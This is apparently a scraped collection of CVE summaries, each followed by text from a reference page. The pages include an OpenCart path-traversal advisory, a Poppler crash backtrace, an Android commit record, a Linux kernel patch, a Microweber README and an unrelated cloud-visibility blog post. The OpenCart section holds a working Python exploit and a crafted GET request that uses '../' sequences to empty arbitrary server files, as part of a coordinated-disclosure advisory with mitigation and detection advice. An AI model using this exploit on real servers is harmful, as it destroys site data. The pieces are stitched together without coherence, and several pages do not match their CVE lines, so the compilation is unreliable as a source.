An issue was discovered in the Hyundai Gen5W_L in-vehicle infotainment system AE_E_PE_EUR.S5W_L001.001.211214. The AppUpgrade binary file, which is used during the firmware installation process, can be modified by an attacker to bypass the digital signature check. This indirectly allows an attacker to install custom firmware in the IVI system.

CVE-2023-26246: Can Work / CHIMAERA · GitLab

Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2 allows an authenticated user with access/modify privilege on the Log component to empty out arbitrary files on the server

**Summary:**

**Product**

OpenCart

**Vendor**

OpenCart

**Severity**

High - Adversaries may exploit software vulnerabilities to empty any file on the server with write permissions.

**Affected Versions**

4.0.0.0 - 4.0.2.2

**Tested Version(s)**

4.0.2.2

**CVE Identifier**

CVE-2023-2315

**CVE Description**

Path traversal in Opencart versions 4.0.0.0 to 4.0.2.2 allows authenticated backend users to empty any existing file on the server with write permissions.

**CWE Classification(s)**

CWE-27 - Path Traversal: ‘dir/../../filename’

**CAPEC Classification(s)**

CAPEC-126 - Path Traversal

**CVSS3.1 Scoring System:**

**Base Score:** 8.1 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

None

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Opencart is an open source ecommerce platform for online merchants to self-host and list their products for sale. It is structured in a way that allows for a quick setup and Opencart also provides a cloud solution for users who do not want to have an on-premise setup. Opencart is split into two fronts: a storefront containing a catalogue that regular users will access, as well as a backend administrative dashboard for management purposes. Account roles for the backend dashboard are highly customizable, allowing the owner of the website to initialise custom roles with different privileges and access, by using the fine-grained controls.

**Vulnerability Summary:**

There is a path traversal vulnerability at the Logs section of the backend dashboard, which allows an authenticated adversary to empty any existing file on the web server, given that there is write permissions on the file. By default, every OpenCart file is able to be emptied. This means that the availability of the website will be heavily impacted by emptying the core files, preventing regular functionality of the website. This vulnerability was introduced from versions 4.0.0.0 onward and patched in version 4.0.2.3.

**Vulnerability Details:**

A backend user with “access” and “modify” permissions on the “tool/log” setting is able to clear the logs of the website. When clearing the logs in a regular use case, a HTTP GET request is sent to delete the file “error.log”, by specifying it in the filename query parameter. The relevant code that is vulnerable can be found below:

    // /admin/controller/tool/log.php
    
    public function clear(): void {
    
        if (isset($this->request->get['filename'])) {
            $filename = (string)$this->request->get['filename']; // [1]
        } else {
            $filename = '';
        }
    
        $json = [];
    
        if (!$this->user->hasPermission('modify', 'tool/log')) {
            $json['error'] = $this->language->get('error_permission');
        }
    
        // DIR_LOGS = /system/storage/logs/
        $file = DIR_LOGS . $filename; // [2]
    
        if (!is_file($file)) {
            $json['error'] = sprintf($this->language->get('error_file'), $filename);
        }
    
        if (!$json) {
            $handle = fopen($file, 'w+'); // [3]
            fclose($handle);
            $json['success'] = $this->language->get('text_success');
        }
        // ...
    }
    

At [1], the filename is obtained from the incoming HTTP GET request and stored into the $filename PHP variable without any form of input sanitisation. At [2], the file name is appended to the back of the storage log path /system/storage/logs/ and stored into another variable $file. At [3], the $file variable is used in a fopen() function call with the mode set to w+. This means that the existing file will have its content emptied. Since a file existence check occurs before this, it is not possible to create files that do not already exist.

In a normal scenario, the file /system/storage/logs/error.log will be emptied after the GET request is sent. However, since there is a lack of input sanitisation, it is possible for the filename query parameter to contain any number of path traversal sequence (../) to traverse out of the intended directory and point to other files instead. This results in other files being emptied and permanently affecting the website’s functionality.

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has a set of valid credentials to the backend dashboard with access and modify permissions on tool/log.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that exploits the Path Traversal vulnerability.

The vulnerability can be exploited by sending a GET request to https://TARGET_HOST/admin/index.php?route=tool/log.clear&user_token=<USER_TOKEN>&filename=../../../../../../tmp/PoC.txt, for example:

    GET /admin/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token=4d6d604d8862798e96fe91846f28a36f HTTP/1.1
    Host: TARGET_HOST
    Cookie: OCSESSID=4f09deedf4a82f9c5b4bee9ec3;
    

Before running the exploit below, please ensure that you create a non-empty file /tmp/PoC.txt and that it has write permissions for the web user:

    $ echo "Hello" > /tmp/PoC.txt
    $ chmod 777 /tmp/PoC.txt 
    $ ls -la /tmp/PoC.txt
    -rwxrwxrwx 1 root root 6 Apr 26 09:36 /tmp/PoC.txt
    

Then, run the exploit below:

    # Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315)
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import re
    import requests
    import sys
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password
    
        print("\n======= Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315) =======")
        print("Please ensure that a file /tmp/PoC.txt with write permissions has been created on the target server with non-empty content!\n")
    
        if len(sys.argv) != 4:
            print("[!] Please enter the required arguments like so: python3 {} http://TARGET_URL/ADMIN_PATH/ USERNAME PASSWORD".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
    
    def authenticate():
        global user_token
    
        print("[+] Attempting to authenticate...")
    
        # Get login_token
        path = f"{target}/index.php"
        res = s.get(path)
        login_token = re.findall("login_token=(.+)\" method", res.text)[0]
        
        # Perform login and get user_token
        data = {
            "username": username,
            "password": password
        }
        path = f"{target}/index.php?route=common/login.login&login_token={login_token}"
        res = s.post(path, data=data)
        user_token = re.findall("user_token=(.+)\"", res.text)[0]
    
        if not user_token:
            print("[!] Failed to authenticate! Are the credentials correct?")
            sys.exit(1)
    
        print("[+] Authenticated successfully.")
    
    def delete():
    
        print("[+] Attempting to empty /tmp/PoC.txt...")
    
        # Empty /tmp/PoC.txt
        path = f"{target}/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token={user_token}"
        res = s.get(path)
        print(f"[+] Output: {res.text}")
    
    def main():
        check_args()
        authenticate()
        delete()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

OpenCart released version 4.0.2.3 that patches this vulnerability. It is recommended to upgrade to the latest version of OpenCart.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the server’s access logs for all GET requests made to /admin/index.php?route=tool/log.clear, and filtering for requests that contain ../ in the filename query parameter.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2022-09-06 Followed the security bug reporting instructions and created an OpenCart forum account to try to report to the administrators, but new accounts are unable to send private messages.
*   2022-09-11 Email sent to [email protected] in an attempt to establish a proper communication channel with the project owner/maintainers.
*   2022-09-12 Support agent replied and suggested to describe the issue in a public channel via their GitHub Issues tracker, to which we reminded that it is a security bug on the latest version. Support agent then requested to send them the report where they will forward it to the developers. We instead requested for the public key of the developers so that the report can be encrypted to prevent information leakage. Support agent replied “they do not have such”.
*   2022-09-14 Tried the “Contact Us” form on OpenCart’s website. Ended up with a second support ticket being opened.
*   2022-09-15 Opened a GitHub Issue (#12684) in a last resort to establish a proper communication channel with the developers. Issue closed immediately by the project owner, and **marked as spam**.
*   2022-09-15 Email sent directly to [email protected] as it is used for GitHub commits.
*   2022-09-15 Project owner replied and we sent the bug report over.
*   2022-09-15 Bug fixed in commit 0a8dd91
*   2023-09-16 New release version 4.0.2.3 containing the patch.
*   2023-09-18 Public Release

CVE-2023-2315: (CVE-2023-2315) Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2

CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.

CVE-2008-2383: #510030 - [CVE-2008-2383] xterm: DECRQSS and comments

Visibility into every environment, including cloud, enables businesses to mitigate operating risks.

In speaking with security and fraud professionals, visibility remains a top priority. This is no surprise, since visibility into the network, application, and user layers is one of the fundamental building blocks of both successful security programs and successful fraud programs. This visibility is required across all environments — whether on-premises, private cloud, public cloud, multicloud, hybrid, or otherwise.

Given this, it is perhaps a bit surprising that visibility in the cloud has lagged behind the move to those environments. This occurred partially because few options for decent visibility were available to businesses as they moved to the cloud. But it also partially happened because higher priority was placed on deploying to the cloud than on protecting those deployments from security and fraud threats.

This is unfortunate, since what we can't see can hurt us. That being said, it is great news that cloud visibility has become a top priority for many businesses. Here are a few areas where many businesses are looking for visibility to play a key role.

**Compliance**

Compliance may not be the most exciting part of our jobs, but it is necessary. Whether because of regulatory requirements, audit requirements, or otherwise, businesses need to show compliance. There are many ways to do so, and visibility is one of them. There is no better way to provide evidence that we are compliant with a given requirement than to have ground-truth data that clearly shows we are.

**Monitoring**

Before we can detect security and fraud issues within our cloud infrastructure, applications, and APIs, we need to be able to monitor them. This necessitates having the requisite visibility at the network, application, and user layers. This means having logging and insight into the cloud environment at the same level we have within the on-premises environment.

**Investigation**

When we either detect a security or fraud issue or are notified of one, we need to begin an investigation. We need to interrogate the data to understand what happened, when it happened, where it happened (to what infrastructure), why it happened (root cause), and how it happened. As straightforward and logical as this seems, without proper visibility it is impossible. It is best to address visibility sooner rather than later, as there is no way to "put back" data we aren't currently collecting when we need it most.

**Response**

Once an incident has been investigated, the proper response can be architected and implemented. If we don't have proper visibility, however, we can't be sure that we are effectively remediating the issue in its entirety. Without adequate visibility, how can we be sure that we haven't missed other issues or other resources that may be impacted?

**API Discovery**

We can't protect what we don't know exists. Believe it or not, unknown APIs — those which security and fraud teams are unaware of — occur more often than we would like to admit. As such, API discovery is another great use case that shows the value of visibility. It is worth the investment of time, energy, and money to discover APIs that may be deployed at various locations around the cloud, on-premises, and/or hybrid infrastructure. Once we are aware of these APIs, we can begin to take steps to gain visibility into those previously unknown environments.

**Application Breaches**

When an application is compromised, it is not necessarily so easy to detect. Unlike network-level or host-level compromises, application-level compromises don't always look like intrusions. Sometimes, they spring from stolen credentials. Other times, they happen due to business logic abuse. At yet other times, they result from attackers hopping through or "piggybacking" on the sessions of legitimate users.

In all of these cases, without the proper visibility into both the application layer and the user layer, it will be nearly impossible to become wise to a breach. This is another area where visibility plays a big role in detecting application breaches early, thus mitigating the risk that results from breaches that persist for long periods of time.

**Malicious User Detection**

With the move to software-as-a-service (SaaS), user authentication and authorization have become increasingly important for granting and controlling access to applications and resources. Malicious users aren't necessarily hackers or attackers. Rather, they may be users who have logged into one or more resources with the intent to misuse or abuse those resources. Visibility into user behavior as the user navigates the session allows us to look for patterns and signs that the user may actually be a malicious one.

We have been a bit behind in terms of ensuring the requisite visibility into cloud environments. We have lost some time, though it does seem that gaining visibility into the network, application, and user layers is now a priority for many businesses. This is a positive development, as it enables those businesses to better mitigate the risks that operating blindly creates.

What We Can't See Can Hurt Us

A reachable Object::dictLookup assertion in Poppler 0.72.0 allows attackers to cause a denial of service due to the lack of a check for the dict data type, as demonstrated by use of the FileSpec class (in FileSpec.cc) in pdfdetach.

Version: latest compiled version from git repo

Command: pdfdetach -save 1 abort2.pdf

Backtrace:

    Internal Error (0): Call to Object where the object was type 3, not the expected type 7
    
    Breakpoint 2, __GI_abort () at abort.c:51
    51      abort.c: No such file or directory.
    (gdb) bt
    #0  __GI_abort () at abort.c:51
    #1  0x0814e543 in Object::dictLookup (key=0x8611060 "Desc", this=0xf3f02854, this=0xf3f02854, recursion=0) at /work/poppler/poppler/Object.h:369
    #2  0x0814fab2 in FileSpec::FileSpec (this=0xf3f02850, fileSpecA=0xf5b06ef4) at /work/poppler/poppler/FileSpec.cc:138
    #3  0x08115ac4 in main (argc=2, argv=0xffffd7a4) at /work/poppler/utils/pdfdetach.cc:180
    (gdb) list FileSpec.cc:138
    133             return;
    134           }
    135         }
    136       }
    137
    138       obj1 = fileSpec.dictLookup("Desc");
    139       if (obj1.isString())
    140         desc = obj1.getString()->copy();
    141     }
    142
    

The pdf file is attached here. reachabort2.pdf

CVE-2018-20650: a reachable abort in FileSpec::FileSpec in FileSpec.cc (#704) · Issues · poppler / poppler · GitLab

In visitUris of Notification.java, there is a possible way to reveal image contents from another user due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.

)\]}' { "commit": "cb6282e8970f4c9db5497889699e68fb2038566e", "tree": "974ae991a39967eee17120b12758de2b2c0f2303", "parents": \[ "7a5e51c918b7097be3c7e669e1825a4d159c4185" \], "author": { "name": "Ioana Alexandru", "email": "aioana@google.com", "time": "Thu Apr 27 14:55:28 2023 +0000" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Thu Jun 08 20:33:40 2023 +0000" }, "message": "Verify URI permissions for notification shortcutIcon.\\n\\nBug: 277593270\\nTest: atest NotificationManagerServiceTest\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:936b58b12851269b878b44cc8df790b3afe9c3f5)\\nMerged-In: Iaf2a9a82f18e018e60e6cdc020da6ebf7267e8b1\\nChange-Id: Iaf2a9a82f18e018e60e6cdc020da6ebf7267e8b1\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "b3921fe8bd79c6c799609cb1419fd291e6094aee", "old\_mode": 33188, "old\_path": "core/java/android/app/Notification.java", "new\_id": "034192ddcecec7487e8764a22915a7e99a218055", "new\_mode": 33188, "new\_path": "core/java/android/app/Notification.java" }, { "type": "modify", "old\_id": "cc0bc24fc660f325b85405f105f5b7ed7f8e7b49", "old\_mode": 33261, "old\_path": "services/tests/uiservicestests/src/com/android/server/notification/NotificationManagerServiceTest.java", "new\_id": "689691b749a3f0f67101637f657563c18a55c647", "new\_mode": 33261, "new\_path": "services/tests/uiservicestests/src/com/android/server/notification/NotificationManagerServiceTest.java" } \] }

CVE-2023-21291

Microweber version 1.3.1 allows an unauthenticated user to perform an account takeover via an XSS on the 'select-file' parameter.

**Microweber: Drag-and-Drop CMS**

**Current version: 1.3 running on Laravel 8!**

**Download | What is Microweber? | Core features of Microweber | Requirements | Installation | Getting Started | Contribute**

**What is Microweber?**

Microweber is a Drag and Drop website builder and a powerful next generation CMS. It's based on the PHP Laravel Framework. You can use Microweber to make any kind of website, online store, and blog. The Drag and Drop technology allows you to build your website without any technical knowledge.

The core idea of the software is to let you create your own website, online shop or blog. From this moment of creation, your journey towards success begins. Supporting you along the way will be different modules, customizations and features of the CMS. Many of them are specifically tailored for e-commerce enthusiasts and bloggers.

The most important thing you need to know is that Microweber pairs the latest Drag & Drop technology, with a revolutionary Real-Time Text Writing & Editing feature. This pair of features delivers an improved user experience, easier and quicker content management, a visually appealing environment, and flexibility.

**Core features of Microweber****Drag & Drop**

Microweber implements Drag & Drop technology. This means that users can manage their content and arrange elements with just a click of the mouse, dragging and dropping them across the screen. Drag & Drop applies to all types of content: images, text fields, videos, and the various modules and customization options you have as a user. The default template “Dream” comes with more than 75+ prepared layouts that you can use via drag and drop.

**Real Time Text Editing**

Live Edit view is the manifestation of the Real-Time Text Writing & Editing core feature of Microweber CMS. Live Edit view changes your website’s interface in real time.

**Powerful Admin Panel**

You can add dynamic pages, posts, and products. All of these can be organized in custom categories in order to achieve a better navigation and showcase of a website's content. New pages can be created using different layouts. In addition, all pages, posts and products come with a number of preset layouts and modules to get users started. These modules can be changed and you can add your own custom set of modules in order to create the most suitable content for your needs.

**E-commerce Solution**

The main focus of Microweber CMS is E-commerce. A rising number of people have grown fond of the idea of online entrepreneurship and we aspire to cover their needs. The software has some built-in features that will help online shop founders see their business grow and excel.

**See it in action**

*   Microweber Live Demo
*   Microweber Video
*   Deploy as DigitalOcean 1-Click App
*   Deploy as alwaysdata 1-Click App

**Requirements**

*   HTTP server
*   Database server
*   PHP >= 8.1
    *   lib-xml must be enabled (with DOM support)
    *   GD PHP extension
    *   intl PHP extension
    *   curl PHP extension
    *   zip PHP extension
    *   openssl PHP extension
    *   bcmath PHP extension
    *   fileinfo PHP extension
    *   pdo_sqlite PHP extension
    *   pdo_mysql PHP extension

**HTTP Server****Apache**

The mod_rewrite module must be enabled in your Apache configuration. Microweber creates the necessary .htaccess files during installation, including one with Deny All directive in each folder to ensure that there are no entry points other than index.php.

**nginx**

Add this location directive to your server configuration block. The root directive must point to the base folder of your Microweber website (which by default is where this readme is located).

    server {
      location / {
        try_files $uri $uri/ /index.php$is_args$args;
      }
      location ~ /(vendor|src|config|storage|.git|.env) {
       deny all;
       return 404;
     }
    }
    
    

**IIS**

You can easily import the .htaccess rewrite rules. Make sure you have enabled the URL Rewrite module for your website.

**Database**

You have several choices for database engine: MySQL, SQLite, Microsoft SQL Server and PostgreSQL. For small websites we highly recommend SQLite. However, you can connect to more storage services (like MongoDB or Neo4j) and take advantage of the Laravel framework.

On the installation screen you can only choose from databases enabled in your PHP configuration. If you don't see your server of choice in the list you have to enable the corresponding PDO extension for your database server. An example for Microsoft SQL Server. PHP usually comes with PDO enabled by default but you might have to uncomment or add extension directives to your php.ini.

**Installation****The fast way: Download and unzip.****Via Composer****Installing dependencies**

You need to have Composer installed in order to download Microweber's dependencies.

You can clone and install Microweber with one command:

    composer create-project microweber/microweber my_site dev-master --prefer-dist --no-dev
    

This will install Microweber in a folder named my_site.

Another way is to first clone the repository and then run composer install in the base directory.

**File permissions**

Make sure these folders, and everything inside, is writeable by the user executing the PHP scripts:

*   config/
*   storage/
*   userfiles/

**Getting Started**

See the online guides for developers.

**Contribute**

We are looking for people who want to help us improve Microweber.

If you are a developer, submitting fixes is easy. Just fork the Microweber repository, make your changes, submit a pull request, and be sure all tests are passing.

**Discord server**

You can join our Discord server here.

**Build Status**

 

**Contributors****Code Contributors**

This project exists thanks to all the people who contribute. \[Contribute\]. 

**Financial Contributors**

Become a financial contributor and help us sustain our community. \[Contribute\]

**Individuals**

**Organizations**

Support this project with your organization. Your logo will show up here with a link to your website. \[Contribute\]

CVE-2022-0698: GitHub - microweber/microweber: Drag and Drop Website Builder and CMS with E-commerce

Zoho ManageEngine SharePoint Manager Plus before 4329 allows account takeover because authorization is mishandled.

CVE-2022-24306: SharePoint Management and Auditing by ManageEngine SharePoint Manager Plus

The packet_set_ring function in net/packet/af_packet.c in the Linux kernel through 4.10.6 does not properly validate certain block-size data, which allows local users to cause a denial of service (integer signedness error and out-of-bounds write), or gain privileges (if the CAP_NET_RAW capability is held), via crafted system calls.

Message ID

56da2aa1dec51c258eb25693ed87e4de72413463.1490796500.git.andreyknvl@google.com

State

Accepted, archived

Delegated to:

David Miller

Headers

show

**Commit Message****Comments**

**Patch**

diff --git a/net/packet/af\_packet.c b/net/packet/af\_packet.c
index a0dbe7ca8f72..2323ee35dc09 100644
\--- a/net/packet/af\_packet.c
+++ b/net/packet/af\_packet.c
@@ -4193,8 +4193,8 @@  static int packet\_set\_ring(struct sock \*sk, union tpacket\_req\_u \*req\_u,
 		if (unlikely(!PAGE\_ALIGNED(req->tp\_block\_size)))
 			goto out;
 		if (po->tp\_version >= TPACKET\_V3 &&
\-		    (int)(req->tp\_block\_size -
\-			  BLK\_PLUS\_PRIV(req\_u->req3.tp\_sizeof\_priv)) <= 0)
+		    req->tp\_block\_size <=
+			  BLK\_PLUS\_PRIV((u64)req\_u->req3.tp\_sizeof\_priv))
 			goto out;
 		if (unlikely(req->tp\_frame\_size < po->tp\_hdrlen +
 					po->tp\_reserve))

CVE-2017-7308: [net,v2,1/3] net/packet: fix overflow in check for priv area size

Nako3edit is the editor component of Nadeshiko 3, a programming language developed based on Japanese. Improper check or handling of exceptional conditions in Nako3edit v3.3.74 and earlier allows a remote attacker to inject an invalid value to decodeURIComponent of nako3edit, which may lead the server to crash.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-41777

**nadesiko3 allows remote attacker to inject invalid value to decodeURIComponent of nako3edit**

Moderate severity GitHub Reviewed Published Dec 5, 2022 • Updated Dec 5, 2022

**Package**

npm nadesiko3 (npm)

**Affected versions**

< 3.3.75

**Description**

Search

lenovo warranty check/lookup | check warranty status | lenovo support us